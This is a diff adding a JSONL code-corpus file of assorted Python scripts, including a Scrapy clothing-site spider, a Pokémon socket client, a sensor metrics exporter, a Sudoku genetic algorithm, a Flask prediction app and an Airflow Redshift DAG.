diff --git "a/520.jsonl" "b/520.jsonl"
new file mode 100644
--- /dev/null
+++ "b/520.jsonl"
@@ -0,0 +1,743 @@
+{"seq_id":"583476916","text":"from scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.selector import Selector\n\nfrom ScrapyParser.items import SpidersItem, WisellItemLoader\n\nimport requests\n\n\nclass WisellSpider(CrawlSpider):\n name = 'wisell'\n\n start_urls = ['https://wisell.ru/catalog/platya/', 'https://wisell.ru/catalog/tuniki_bluzy/']\n allowed_domains = ['wisell.ru']\n\n rules = [Rule(LinkExtractor(restrict_xpaths=['//*[@id=\"catalog-lements-id\"]//li'],\n allow='/catalog/([A-Za-z0-9-_]+)/([A-Za-z0-9-]+)'),\n callback='parse_item'),\n Rule(LinkExtractor(restrict_xpaths=['//*[@id=\"main-catalog\"]/footer[1]/div/ul/li[6]']), follow=True)]\n\n def parse_item(self, response):\n selector = Selector(response)\n loader = WisellItemLoader(SpidersItem(), selector)\n loader.add_value('url', response.url)\n loader.add_xpath('price', '//*[@id=\"currency_tab-1\"]/div/div[2]/span/span/text()')\n loader.add_value('is_new', True if selector.xpath('//*[@id=\"item1\"]/div/span[2]/span/span').extract() else False)\n loader.add_value('site', 'wisell')\n small_url = selector.xpath('//*[@id=\"size-interval-tabs\"]/li/@data-url').extract()\n is_big = True if selector.xpath('//*[@id=\"size-interval-tabs\"]'\n '/li/a/@href').extract()[0] == '#size_rang-2' else False\n loader.add_value('_type', selector.xpath('//h1/text()').extract()[0].split(' ')[0])\n if small_url[0] and len(small_url) > 1:\n big_name = selector.xpath('//h1/text()').extract()[0].split(' ')[1]\n sizes_list = selector.xpath('//*[@id=\"size_rang-1\"]/div/ul/li/label//span/text()').extract()\n sizes_list.remove(sizes_list[0])\n small_size_link = 'https://wisell.ru%s' % (small_url[0])\n r = requests.get(small_size_link)\n selector = Selector(r)\n small_name = selector.xpath('//h1/text()').extract()[0].split(' ')[1]\n loader.add_value('name', '%s %s' % (big_name, small_name))\n small_sizes = selector.xpath('//*[@id=\"size_rang-1\"]/div/ul/li/label//span/text()').extract()\n small_sizes.remove(small_sizes[0])\n for size in small_sizes:\n if int(size) > 46 and size not in sizes_list:\n sizes_list.append(size)\n sizes_list.sort()\n loader.add_value('sizes', sizes_list)\n return loader.load_item()\n elif len(small_url) == 1 and is_big:\n loader.add_value('name', selector.xpath('//h1/text()').extract()[0].split(' ')[1])\n sizes_list = selector.xpath('//*[@id=\"size_rang-1\"]/div/ul/li/label//span/text()').extract()\n sizes_list.remove(sizes_list[0])\n loader.add_value('sizes', sizes_list)\n return loader.load_item()","sub_path":"ScrapyParser/spiders/wisell_spider.py","file_name":"wisell_spider.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"632153650","text":"#!/usr/bin/env python3\n\nimport sys\nimport socket\nfrom struct import *\nfrom PIL import Image\nimport io\n\ndef es_entero(s):\n '''\n Funcion de verificacion que nos dice si s es un\n entero al hacer el cast\n :param s: str\n String que queremos verificar\n :return: True si en efecto se trata de un entero, False en otro caso\n '''\n try:\n int(s)\n return True\n except ValueError:\n return False\n\ndef envia_mensaje(sock, mensaje):\n '''\n Funcion que se encarga de enviar el mensaje a traves del socket\n :param sock: Socket a traves del cual mandaremos el mensaje\n :param mensaje: Mensaje que queremos mandar ya codificado\n :return: void\n '''\n MSGLEN = 1024\n totalsent = 0\n while totalsent < MSGLEN:\n sent = sock.send(mensaje[totalsent:])\n if sent == 0:\n raise RuntimeError(\"socket connection broken\")\n totalsent = totalsent + sent\n break\n\ndef recibe_mensaje(sock,MSGLEN = 1024):\n '''\n Funcion que se encarga de la recepcion de mensajes\n :param sock: socket que recibira el mensaje\n :param MSGLEN: Tama;o del buffer sobre el que leeremps\n :return: El mensaje obtenido del socket\n '''\n return sock.recv(MSGLEN)\n\n\ndef termina_sesion(sock):\n '''\n Funcion que se encarga de enviar un mensaje de fin de sesion al\n servidor y posteriormente terminar con la ejecucion del programa\n :param sock: Socket que enviara el mensaje y que terminara su sesion\n :return: void\n '''\n print(\"Terminando sesion\")\n envia_mensaje(sock, pack('b', 32)) # Enviamos mensaje de termino de sesion\n sock.close()\n exit()\n\ndef lee_imagen(mensaje):\n '''\n Funcion que se encarga de decodificar una imagen\n recibida en un mensaje codificado y posteriormente desplegar\n la imagen\n :param mensaje: Mensaje a decodificar\n :return: void\n '''\n (i,), mensaje = unpack(\"I\", mensaje[:4]), mensaje[4:]\n (i,), imagen = unpack(\"I\", mensaje[:4]), mensaje[4:]\n image = Image.open(io.BytesIO(imagen))\n image.show()\n\n\nif len(sys.argv) < 4:\n print(\"usage:\", sys.argv[0], \" <'pokedex'> \\n El ultimo argumento es por si se desea consultar la pokedex actual del usuario\")\n sys.exit(1)\nif not es_entero(sys.argv[3]):\n print(\"El id debe ser un entero\")\n sys.exit(1)\nif not es_entero(sys.argv[2]):\n print(\"El puerto debe ser un entero\")\n sys.exit(1)\nhost, port, id_usuario = sys.argv[1:4]\nid_usuario = int(id_usuario)\n\n\n\nserver_addr = (host, int(port))\nprint(\"Inicializando la conexion en \", server_addr)\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect_ex(server_addr)\nif len(sys.argv) == 5:\n if sys.argv[4].lower()== \"pokedex\":\n #Queremos la pokedex\n envia_mensaje(sock, pack('bb', 43, id_usuario)) #Codigo que pide la pokedex\n mensaje = recibe_mensaje(sock)\n if mensaje[0] == 44:\n longitud_string = mensaje[1]\n pokedex = unpack('%ds'%longitud_string ,mensaje[2:])[0].decode(\"utf-8\")\n print(\"Tu pokedex es la siguiente: \")\n print(pokedex)\n exit()\n\ntry:\n #Comenzamos con el mensaje inicial con el codigo 10 y el id\n msg = pack('bb',10,id_usuario)\n envia_mensaje(sock,msg)\n chunk = recibe_mensaje(sock)\n codigo = chunk[0]\n #En este punto el codigo puede ser 11 o 20\n if codigo == 41:\n print(\"El ID ingresado es invalido, intente con otro please\")\n termina_sesion(sock)\n if not codigo == 20:\n print(\"Ha ocurrido un error! Intenta de nuevo por favor :(\")\n termina_sesion(sock)\n #Nos regreso un string con pokemon con el codigo 20\n longitud_string = chunk[1]\n #Decodificamos el mensaje que recibimos donde esta el nombre del pokemon\n # y pasamos los bytes decodificados a un string para imprimir el mensaje al cliente\n nombre_pokemon = unpack('%ds'%longitud_string ,chunk[2:])[0].decode(\"utf-8\")\n print(\"Gusta capturar al pokemon %s?\"%nombre_pokemon)\n text = input(\"[si/No]\")\n if text != \"si\":\n termina_sesion(sock)\n\n puedo_intentar = True\n envia_mensaje(sock, pack('b', 30)) # Enviamos que si queremos intentar capturarlo\n mensaje = recibe_mensaje(sock,100000) #Aumentamos el tama;o del buffer porque puede haber una imagen\n while puedo_intentar:\n if mensaje[0] == 21:\n #No lo atrapamos por lo que imprimimos los intentos restantes\n intentos_restantes = mensaje[1]\n print(\"¿Intentar captura de nuevo? Quedan %d intentos.\"%intentos_restantes)\n text = input(\"[si/No]\")\n if text != \"si\":\n termina_sesion(sock)\n envia_mensaje(sock, pack('b', 30)) #Enviamos que queremos intentar nuevamente\n elif mensaje[0] == 22:\n print(\"Felicidades, has atrapado a %s\"%nombre_pokemon)\n lee_imagen(mensaje)\n puedo_intentar = False\n termina_sesion(sock)\n elif mensaje[0] == 23:\n print(\"Se han terminado tus intentos :/\")\n termina_sesion(sock)\n elif mensaje[0] == 42:\n print(\"Ha ocurrido un error u.u intenta de nuevo\")\n termina_sesion(sock)\n else:\n puedo_intentar = False\n print(\"Ha ocurrido un error, intenta de nuevo por favor\")\n termina_sesion(sock)\n mensaje = recibe_mensaje(sock, 100000)\n\n\nexcept KeyboardInterrupt:\n print(\"Interrupcion de teclado \\n Abortando...\\n Abortando..\\n Abortado X.X\")\nfinally:\n sock.close()","sub_path":"src/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"378631841","text":"# This script detects for the presence of either a BME680 sensor on the I2C bus or a Sense HAT\n# The BME680 includes sensors for temperature, humidity, pressure and gas content\n# The Sense HAT does not have a gas sensor, and so air quality is approximated using temperature and humidity only.\n\nimport sys\nimport time\nimport smbus\nimport os\nimport _thread\nimport time\n\nfrom bme680 import BME680\nfrom prometheus_client import Gauge, start_http_server\nfrom w1therm import W1THERM\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\nclass balenaSense():\n readfrom = 'unset'\n bus = smbus.SMBus(1)\n\n def __init__(self):\n # First, check to see if there is a BME680 on the I2C bus\n try:\n self.bus.write_byte(0x76, 0)\n except IOError:\n print('BME680 not found on 0x76, trying 0x77')\n else:\n self.readfrom = 'bme680primary'\n\n # If we didn't find it on 0x76, look on 0x77\n if self.readfrom == 'unset':\n try:\n self.bus.write_byte(0x77, 0)\n except IOError:\n print('BME680 not found on 0x77')\n else:\n self.readfrom = 'bme680secondary'\n\n\n # If no BME680, is there a Sense HAT?\n if self.readfrom == 'unset':\n try:\n self.bus.write_byte(0x5F, 0)\n except:\n print('Sense HAT not found')\n else:\n self.readfrom = 'sense-hat'\n print('Using Sense HAT for readings (no gas measurements)')\n\n # Import the sense hat methods\n import sense_hat_air_quality\n from hts221 import HTS221\n self.sense_hat_reading = lambda: sense_hat_air_quality.get_readings(HTS221())\n else:\n print('Using BME680 for readings')\n\n # Import the BME680 methods\n self.sensor = BME680(self.readfrom)\n\n\n # Next, check if there is a 1-wire temperature sensor (e.g. DS18B20)\n if self.readfrom == 'unset':\n if os.environ.get('BALENASENSE_1WIRE_SENSOR_ID') != None:\n sensor_id = os.environ['BALENASENSE_1WIRE_SENSOR_ID']\n else:\n sensor_id = None\n\n try:\n self.sensor = W1THERM(sensor_id)\n except:\n print('1-wire sensor not found')\n else:\n self.readfrom = '1-wire'\n print('Using 1-wire for readings (temperature only)')\n\n # If this is still unset, no sensors were found; quit!\n if self.readfrom == 'unset':\n print('No suitable sensors found! Exiting.')\n sys.exit()\n\n def sample(self):\n if self.readfrom == 'sense-hat':\n return self.apply_offsets(self.sense_hat_reading())\n else:\n return self.apply_offsets(self.sensor.get_readings(self.sensor))\n\n\n def apply_offsets(self, measurements):\n # Apply any offsets to the measurements before storing them in the database\n if os.environ.get('BALENASENSE_TEMP_OFFSET') != None:\n measurements[0]['fields']['temperature'] = measurements[0]['fields']['temperature'] + float(os.environ['BALENASENSE_TEMP_OFFSET'])\n\n if os.environ.get('BALENASENSE_HUM_OFFSET') != None:\n measurements[0]['fields']['humidity'] = measurements[0]['fields']['humidity'] + float(os.environ['BALENASENSE_HUM_OFFSET'])\n\n if os.environ.get('BALENASENSE_ALTITUDE') != None:\n # if there's an altitude set (in meters), then apply a barometric pressure offset\n altitude = float(os.environ['BALENASENSE_ALTITUDE'])\n measurements[0]['fields']['pressure'] = measurements[0]['fields']['pressure'] * (1-((0.0065 * altitude) / (measurements[0]['fields']['temperature'] + (0.0065 * altitude) + 273.15))) ** -5.257\n\n return measurements\n\n# \"eco2_ppm\", \"air_quality_score_accuracy\", \"bvoce_ppm\", \"temperature\", \"pressure\", \"air_quality_score\", \"humidity\"\n\n# Start the server to answer requests for readings\nbalenasense = balenaSense()\n\n# \"eco2_ppm\", \"air_quality_score_accuracy\", \"bvoce_ppm\", \"temperature\", \"pressure\", \"air_quality_score\", \"humidity\"\ngauge = Gauge('bme680_metrics', 'bme680_metrics', ['type'])\n\ndef fill_gauge():\n print('starting fill gauge thread')\n while True:\n time.sleep(5)\n try:\n measurements = balenasense.sample()\n except Exception as e:\n print('COULD NOT GET MEASUREMENTS', e)\n continue\n\n for k, v in measurements[0]['fields'].items():\n gauge.labels(type=k).set(v)\n\n_thread.start_new_thread(fill_gauge, ())\n\nprint('starting server at port 4242')\nstart_http_server(4242)\n","sub_path":"sensor/scripts/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"402534504","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.schema import MetaData\nfrom ouroboros.utils.meta import id, rename_table, exclude_columns, rename_columns\n\nconverters = {\n 'auth_group': [id()],\n 'blogs_category': [id()],\n 'commons_material': [id()],\n 'django_flatpage': [id()],\n 'django_flatpage_sites': [id()],\n 'django_site': [id()],\n 'profiles_skill': [id()],\n 'projects_category': [id()],\n 'tagging_tag': [id()],\n 'blogs_entry': [id()],\n\n 'auth_user': [rename_table('personas_persona')],\n\n 'events_event_members': [rename_table('events_event_attendees'),\n rename_columns({'user_id': 'persona_id'})],\n\n 'announcements_announcement': [exclude_columns(['upsated_by_id',\n 'publish_at',\n 'publish_at_date']),\n rename_columns({'sage': 'silently'})],\n 'events_event': [exclude_columns(['publish_at', 'publish_at_date'])],\n\n 'projects_project': [exclude_columns(['updated_by_id',\n 'publish_at',\n 'publish_at_date',\n 'bugwaz_id',\n 'permission']),\n rename_columns({'author_id': 'administrator_id'})],\n\n 'projects_project_members': [rename_columns({'user_id': 'persona_id'})],\n\n 'profiles_profile_skills': [rename_columns({'user_id': 'persona_id'})],\n\n 'star_star': [rename_table('stars_star'),\n rename_columns({'comment': 'quotes'}),\n exclude_columns(['tag'])]\n}\n\ndef pipe_functions(dic, key):\n def piped(x):\n r = x\n for d in dic:\n r = d[key](r)\n return r\n\n return piped\n\n\nif __name__ == '__main__':\n\n src_engine = create_engine('sqlite:///db/kawaz.db')\n dst_engine = create_engine('sqlite:///db/kawaz3.db', echo=True)\n\n src_meta = MetaData(bind=src_engine)\n src_meta.reflect()\n dst_meta = MetaData(bind=dst_engine)\n\n src_session = sessionmaker(bind=src_engine)()\n dst_session = sessionmaker(bind=dst_engine)()\n\n for src_tn in src_meta.tables:\n src_table = src_meta.tables[src_tn]\n if src_tn in converters:\n schema_convert = pipe_functions(converters[src_tn], 'table')\n dst_table = schema_convert(src_table).tometadata(dst_meta)\n dst_table.create()\n dst_session.commit()\n for r in src_session.query(src_table).all():\n src_record = r._asdict()\n record_convert = pipe_functions(converters[src_tn], 'record')\n dst_record = record_convert(src_record)\n ins = dst_table.insert(values=dst_record)\n dst_session.execute(ins)\n dst_session.commit()\n","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"467931667","text":"def solve(MEMBERS, FANS):\n res = 0\n for i in range(len(FANS) - len(MEMBERS) + 1):\n for j in range(len(MEMBERS)):\n if MEMBERS[j] == 'M' and FANS[j + i] == 'M':\n break\n else:\n res += 1\n return res\n\n\nif __name__ == \"__main__\":\n C = int(input())\n for _ in range(C):\n MEMBERS = input()\n FANS = input()\n print(solve(MEMBERS, FANS))\n","sub_path":"algospot.com/FANMEETING/solve_BruteForceTLE.py","file_name":"solve_BruteForceTLE.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"314760980","text":"import random\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nfrom deap import creator, base, tools, algorithms\nimport time\n\nstart_time = time.clock()\n''''\nfixedValues = np.array([\n\t\t\t\t\t\t#(val, row, col)\n\t\t\t\t\t\t(7, 0, 3),\n\t\t\t\t\t\t(1, 1, 0),\n\t\t\t\t\t\t(4, 2, 3),\n\t\t\t\t\t\t(3, 2, 4),\n\t\t\t\t\t\t(2, 2, 6),\n\t\t\t\t\t\t(6, 3, 8),\n\t\t\t\t\t\t(5, 4, 3),\n\t\t\t\t\t\t(9, 4, 5),\n\t\t\t\t\t\t(4, 5, 6),\n\t\t\t\t\t\t(1, 5, 7),\n\t\t\t\t\t\t(8, 5, 8),\n\t\t\t\t\t\t(8, 6, 4),\n\t\t\t\t\t\t(1, 6, 5),\n\t\t\t\t\t\t(2, 7, 2),\n\t\t\t\t\t\t(5, 7, 7),\n\t\t\t\t\t\t(4, 8, 1),\n\t\t\t\t\t\t(3, 8, 6)\n\t\t\t\t\t\t])\n\n'''\nfixedValues = np.array([\n\t\t\t\t\t\t#(val, row, col)\n\t\t\t\t\t\t(9, 0, 5),\n\t\t\t\t\t\t(5, 0, 8),\n\t\t\t\t\t\t(9, 1, 2),\n\t\t\t\t\t\t(1, 1, 3),\n\t\t\t\t\t\t(7, 1, 8),\n\t\t\t\t\t\t(8, 2, 0),\n\t\t\t\t\t\t(3, 2, 5),\n\t\t\t\t\t\t(4, 2, 8),\n\t\t\t\t\t\t(9, 3, 0),\n\t\t\t\t\t\t(6, 3, 1),\n\t\t\t\t\t\t(1, 3, 5),\n\t\t\t\t\t\t(8, 3, 6),\n\t\t\t\t\t\t(2, 5, 2),\n\t\t\t\t\t\t(6, 5, 3),\n\t\t\t\t\t\t(5, 5, 7),\n\t\t\t\t\t\t(1, 5, 8),\n\t\t\t\t\t\t(3, 6, 0),\n\t\t\t\t\t\t(9, 6, 3),\n (2, 6, 8),\n (1, 7, 0),\n (2, 7, 5),\n (3, 7, 6),\n (7, 8, 0),\n (4, 8, 3)\n ])\n'''\nfixedValues = np.array([\n\t\t\t\t\t\t#(val, row, col)\n\t\t\t\t\t\t(4, 0, 0),\n\t\t\t\t\t\t(5, 0, 5),\n\t\t\t\t\t\t(9, 1, 1),\n\t\t\t\t\t\t(6, 1, 4),\n\t\t\t\t\t\t(6, 2, 0),\n\t\t\t\t\t\t(2, 2, 4),\n\t\t\t\t\t\t(4, 2, 6),\n (8, 2, 7),\n\t\t\t\t\t\t(8, 3, 1),\n\t\t\t\t\t\t(7, 3, 5),\n\t\t\t\t\t\t(6, 3, 7),\n\t\t\t\t\t\t(4, 3, 8),\n (5, 4, 1),\n (9, 4, 2),\n (8, 4, 6),\n (3, 4, 7),\n\t\t\t\t\t\t(7, 5, 0),\n\t\t\t\t\t\t(6, 5, 1),\n\t\t\t\t\t\t(9, 5, 3),\n\t\t\t\t\t\t(5, 5, 7),\n\t\t\t\t\t\t(7, 6, 1),\n\t\t\t\t\t\t(5, 6, 2),\n (4, 6, 4),\n (8, 6, 8),\n (7, 7, 4),\n (4, 7, 7),\n (1, 8, 3),\n (2, 8, 8),\n ])\n'''\ndef printBoard(board):\n\tfor i in range(len(board)):\n\t\tif(i % 3 == 0 and i != 0):\n\t\t\tprint(\"------+------+------\")\n\t\tfor j in range(len(board[i])):\n\t\t\tif(j % 3 == 0 and j != 0):\n\t\t\t\tsys.stdout.write(\"|\")\n\t\t\tsys.stdout.write(str(board[i][j]) + \" \")\n\t\tprint(\"\")\n\ndef printBoardFromDNA64(individual):\n\tboard = buildBoardFromDNA64(individual)\n\tprintBoard(board)\n\ndef setup():\n\tboard = (np.indices((9,9)) + 1)[1]\n\tfor i in range(len(board)):\n\t\tboard[i] = np.random.permutation(board[i])\n\n\tfor (val, row, col) in fixedValues:\n\t\t\tswapToPlace(board, val, row, col)\n\n\tmask = np.ones((9,9), dtype=bool)\n\tfor (val, row, col) in fixedValues:\n\t\t\tmask[row][col] = False\n\n\tDNA = board[mask]\n\treturn DNA.tolist()\n\ndef swapToPlace(board, val, line, col):\n\t\tvalIndex = np.where(board[line]==val)[0][0]\n\t\tswap(board[line], valIndex, col)\n\ndef swap(arr, pos1, pos2):\n\tarr[pos1], arr[pos2] = arr[pos2], arr[pos1]\n\ncreator.create(\"FitnessMax\", base.Fitness, weights=(1.0,))\ncreator.create(\"Individual\", list, fitness=creator.FitnessMax)\n\ntoolbox = base.Toolbox()\n\ntoolbox.register(\"pos_val\", setup)\ntoolbox.register(\"individual\", tools.initIterate, creator.Individual, toolbox.pos_val)\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n\ndef fitnessFromDNA64(individual):\n\tboard = buildBoardFromDNA64(individual)\n\treturn fitnessFromBoard(board),\n\ndef buildBoardFromDNA64(individual):\n\tflattenedIdx = list(map(lambda t: t[1]*9 + t[2], fixedValues))\n\tvalues = fixedValues.T[0]\n\tflatBoard = []\n\tfixedValuesCounter = 0\n\tfor i in range(81):\n\t\tif(i in flattenedIdx):\n\t\t\tflatBoard.append(values[fixedValuesCounter])\n\t\t\tfixedValuesCounter += 1\n\t\t\tcontinue\n\t\tflatBoard.append(individual[i - fixedValuesCounter])\n\treturn np.array(flatBoard).reshape(9,9)\n\n\ndef fitnessFromBoard(board):\n\tscore = 0\n\trows, cols = board.shape\n\tfor row in board:\n\t\tscore += len(np.unique(row))\n\tfor col in board.T:\n\t\tscore += len(np.unique(col))\n\tfor i in range(0, 3):\n\t for j in range(0, 3):\n\t sub = board[3*i:3*i+3, 3*j:3*j+3]\n\t score += len(np.unique(sub))\n\treturn score\n\ntoolbox.register(\"evaluate\", fitnessFromDNA64)\ntoolbox.register(\"mate\", tools.cxTwoPoint)\ntoolbox.register(\"mutate\", tools.mutUniformInt, low=1, up=9, indpb=0.05)\ntoolbox.register(\"select\", tools.selTournament, tournsize=3) \n\npopulation = toolbox.population(n=1000)\n\ngensMin = []\ngensMax = []\ngensAvg = []\ngensStd = []\n\nNGEN=500\nMUPCT = 0.15\nstagnated = 0\nstagnation_limit = 300\nprevMax = -1\nfor gen in range(NGEN):\n\tprint(\"---GEN %i ---\" % gen)\n\toffspring = algorithms.varAnd(population, toolbox, cxpb=0.8, mutpb=MUPCT)\n\tfits = toolbox.map(toolbox.evaluate, offspring)\n\tfor fit, ind in zip(fits, offspring):\n\t\tind.fitness.values = fit\n\t\n\t# Gather all the fitnesses in one list and print the stats\n\tfits = [ind.fitness.values[0] for ind in offspring]\n\n\tlength = len(population)\n\tmean = sum(fits) / length\n\tsum2 = sum(x*x for x in fits)\n\tstd = abs(sum2 / length - mean**2)**0.5\n\n\tcurrMax = max(fits)\n\n\tif(currMax == prevMax):\n\t\tstagnated+=1\n\telse:\n\t\tstagnated = 0\n\t\tprevMax = currMax\n\n\tgensMin.append(min(fits))\n\tgensMax.append(max(fits))\n\tgensAvg.append(mean)\n\tgensStd.append(std)\n\n\tprint(\" Max %s\" % int(max(fits)))\n\tpopulation = toolbox.select(offspring, k=len(population))\ntopk = tools.selBest(population, k=1)\nfor solution in topk:\n\tprint(\"Pontos: %i/243\" % int(fitnessFromDNA64(solution)[0]))\n\tprintBoardFromDNA64(solution)\n\tprint(\"\")\n\nplt.subplot(111)\nplt.plot(gensMax, label=\"Max\")\nplt.plot(gensAvg, label=\"Avg\")\nplt.plot(gensMin, label=\"Min\")\nplt.legend(bbox_to_anchor=(0.8, 0.0, 0.2, .102), loc=3, ncol=1, mode=\"expand\", borderaxespad=0.)\nplt.title('Genetic Algorithm (Population = 1000, Crossover = 80%, Mutation = 15%)')\nplt.ylabel('Fitness Value (Max 243)')\nplt.xlabel('Iterations')\nplt.show()\nplt.savefig('GA_hard.png')\n\nprint(time.clock() - start_time, \"seconds\")","sub_path":"genetic2.py","file_name":"genetic2.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"505909178","text":"import numpy as np\nimport pandas as pd\nfrom flask import Flask, request, jsonify, render_template\nimport pickle\nfrom sklearn.externals import joblib\n\n\nwith open('model.pkl', 'rb') as model_file:\n model = pickle.load(model_file)\n\ntrain_data = pd.read_csv(\"filtered.csv\")\n# print(train_data)\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/predict', methods=[\"POST\"])\ndef predict():\n \"\"\"\n For handling predictions\n \"\"\"\n int_features = [34, 5, 5037, 11, 2015, 1.444444, 5037, 19, 19, 5]\n int_features2 = [int(x) for x in request.form.values()]\n k_features = train_data[(train_data['item_id'] == int_features2[1]) & (train_data['shop_id'] == int_features2[0])]\n if len(k_features) == 0:\n return render_template('index.html', predict_text=f\"Item id: %s and shop id: %s does not exits in our record\" % (int_features2[1], int_features2[0]))\n \n # final_features = [np.array(int_features)]\n prediction = model.predict(k_features)\n return render_template('index.html', predict_text=prediction)\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"315315022","text":"\"\"\"Main DAG file.\"\"\"\n\nfrom datetime import datetime, timedelta\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators import (StageToRedshiftOperator, LoadFactOperator,\n LoadDimensionOperator, DataQualityOperator)\nfrom helpers import SqlQueries\n\ndefault_args = {\n 'owner': 'jonathankamau',\n 'start_date': datetime(2019, 1, 12),\n 'depends_on_past': False,\n 'retries': 3,\n 'retry_delay': timedelta(minutes=5),\n 'email_on_retry': False\n\n}\n\ndag = DAG('udac_example_dag',\n default_args=default_args,\n description='Load and transform data in Redshift with Airflow',\n schedule_interval='0 * * * *',\n catchup=False\n )\n\nstart_operator = DummyOperator(task_id='Begin_execution', dag=dag)\n\nstage_events_to_redshift = StageToRedshiftOperator(\n task_id='Stage_events',\n dag=dag,\n provide_context=True,\n table='staging_events',\n drop_table=True,\n aws_connection_id='aws_credentials',\n redshift_connection_id='redshift',\n create_query=SqlQueries.create_staging_events_table,\n s3_bucket='udacity-dend',\n s3_key='log_data',\n copy_options=\"json 's3://udacity-dend/log_json_path.json'\"\n)\n\nstage_songs_to_redshift = StageToRedshiftOperator(\n task_id='Stage_songs',\n dag=dag,\n provide_context=True,\n table='staging_songs',\n drop_table=True,\n aws_connection_id='aws_credentials',\n redshift_connection_id='redshift',\n create_query=SqlQueries.create_staging_songs_table,\n s3_bucket='udacity-dend',\n s3_key='song_data',\n copy_options=\"json 'auto'\"\n)\n\nload_songplays_table = LoadFactOperator(\n task_id='Load_songplays_fact_table',\n dag=dag,\n conn_id='redshift',\n target_table='songplays',\n drop_table=True,\n create_query=SqlQueries.create_songplays_table,\n insert_query=SqlQueries.songplay_table_insert,\n append=False\n)\n\nload_user_dimension_table = LoadDimensionOperator(\n task_id='Load_user_dim_table',\n dag=dag,\n conn_id='redshift',\n target_table='users',\n drop_table=True,\n create_query=SqlQueries.create_users_table,\n insert_query=SqlQueries.user_table_insert,\n append=False\n)\n\nload_song_dimension_table = LoadDimensionOperator(\n task_id='Load_song_dim_table',\n dag=dag,\n conn_id='redshift',\n target_table='songs',\n drop_table=True,\n create_query=SqlQueries.create_songs_table,\n insert_query=SqlQueries.song_table_insert,\n append=False\n)\n\nload_artist_dimension_table = LoadDimensionOperator(\n task_id='Load_artist_dim_table',\n dag=dag,\n conn_id='redshift',\n target_table='artists',\n drop_table=True,\n create_query=SqlQueries.create_artist_table,\n insert_query=SqlQueries.artist_table_insert,\n append=False\n)\n\nload_time_dimension_table = LoadDimensionOperator(\n task_id='Load_time_dim_table',\n dag=dag,\n conn_id='redshift',\n target_table='time',\n drop_table=True,\n create_query=SqlQueries.create_time_table,\n insert_query=SqlQueries.time_table_insert,\n append=False\n)\n\nrun_quality_checks = DataQualityOperator(\n task_id='Run_data_quality_checks',\n dag=dag,\n conn_id='redshift',\n target_tables=[\"songplays\", \"users\", \"songs\", \"artists\", \"time\"],\n)\n\nend_operator = DummyOperator(task_id='End_execution', dag=dag)\n\nstart_operator.set_downstream(\n [stage_events_to_redshift, stage_songs_to_redshift])\nload_songplays_table.set_upstream(\n [stage_events_to_redshift, stage_songs_to_redshift])\nload_songplays_table.set_downstream(\n [load_song_dimension_table, load_user_dimension_table, \n load_artist_dimension_table, load_time_dimension_table])\nrun_quality_checks.set_upstream(\n [load_song_dimension_table, load_user_dimension_table,\n load_artist_dimension_table, load_time_dimension_table])\nend_operator.set_upstream(run_quality_checks)\n","sub_path":"dags/udac_example_dag.py","file_name":"udac_example_dag.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"605508276","text":"\"\"\"\nMeasure how much overlap there is between training, validation and test samples\n\"\"\"\n\nprint(__doc__)\n\nfrom six.moves import cPickle as pickle\nimport numpy as np\n\n# test_pickle = open(\"notMNIST_small\\\\A.pickle\", 'rb')\n# data = pickle.load(test_pickle)\n# test_pickle.close()\n\npickle_file = open('notMNIST.pickle', 'rb')\ndata = pickle.load(pickle_file)\npickle_file.close()\ntrain_data = data['train_dataset']\n# test_data = data['test_dataset']\nvalid_data = data['valid_dataset']\ndel data\ntrain_data = train_data.reshape(train_data.shape[0], train_data.shape[\n 1] * train_data.shape[2])\n# test_data = test_data.reshape(test_data.shape[0], test_data.shape[1]*test_data.shape[2])\nvalid_data = valid_data.reshape(valid_data.shape[0], valid_data.shape[\n 1] * valid_data.shape[2])\n\n\ndef matrix_cmp(matrix_1, matrix_2):\n if matrix_1.shape[1] != matrix_2.shape[1]:\n print('Input vectors must havs same size!')\n return -1\n count = 0\n for i in matrix_1:\n for j in matrix_2:\n dis = np.linalg.norm(i - j)\n if dis == 0:\n count = count + 1\n return count / matrix_1.shape[0]\n\n# print('overlap between training and test samples:%.2f.\\n'% matrix_cmp(train_data[:10000], test_data))\nprint('overlap between training and validation samples:%.2f.\\n' %\n matrix_cmp(train_data[:10000], valid_data))\n# print('overlap between test and validation samples:%.2f.\\n'% matrix_cmp(test_data, valid_data))\n","sub_path":"overlap_measure.py","file_name":"overlap_measure.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
